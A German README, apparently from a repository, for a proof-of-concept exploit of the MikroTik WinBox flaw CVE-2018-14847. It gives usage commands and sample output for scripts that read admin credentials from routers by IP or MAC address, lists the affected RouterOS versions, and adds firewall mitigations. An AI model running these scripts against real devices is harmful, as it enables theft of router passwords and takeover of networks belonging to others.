
Dies ist ein Proof of Concept der kritischen WinBox-Schwachstelle (CVE-2018-14847), die das beliebige Lesen von Dateien mit Klartext-Passwörtern ermöglicht. Die Schwachstelle wurde bereits vor langer Zeit behoben, daher ist dieses Projekt beendet und wird nicht mehr unterstützt oder aktualisiert. Du kannst es stattdessen forken und selbst aktualisieren.
Dies ist ein Proof of Concept der kritischen WinBox-Sicherheitslücke (CVE-2018-14847), die das beliebige Lesen von Dateien mit Klartext-Passwörtern ermöglicht.
Die Sicherheitslücke wurde bereits vor langer Zeit behoben, daher ist dieses Projekt beendet und wird nicht mehr unterstützt oder aktualisiert. Du kannst es stattdessen forken und selbst aktualisieren.
https://n0p.me/winbox-bug-dissection/
Dieses Skript läuft NICHT mit Python 2.x oder niedriger.
Das Skript wird einfach mit einfachen Argumenten in der Befehlszeile verwendet.
Nutze die Sicherheitslücke aus und lies das Passwort.
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
Beispiel:
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord
Du kannst Dateien extrahieren, selbst wenn das Gerät keine IP-Adresse hat.
Einfacher Erkennungscheck für lokal verbundene Mikrotik-Geräte.
python3 MACServerDiscover.py
Beispiel:
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Nutze die Sicherheitslücke aus und lies das Passwort.
python3 MACServerExploit.py <MAC-ADDRESS>
Beispiel:
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: Th3P4ssWord
Alle RouterOS-Versionen von 2015-05-28 bis 2018-04-20 sind für diesen Exploit anfällig.
Mikrotik-Geräte mit den folgenden RouterOS-Versionen:
Für weitere Informationen siehe: https://blog.mikrotik.com/security/winbox-vulnerability.html
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
/tool mac-server mac-winbox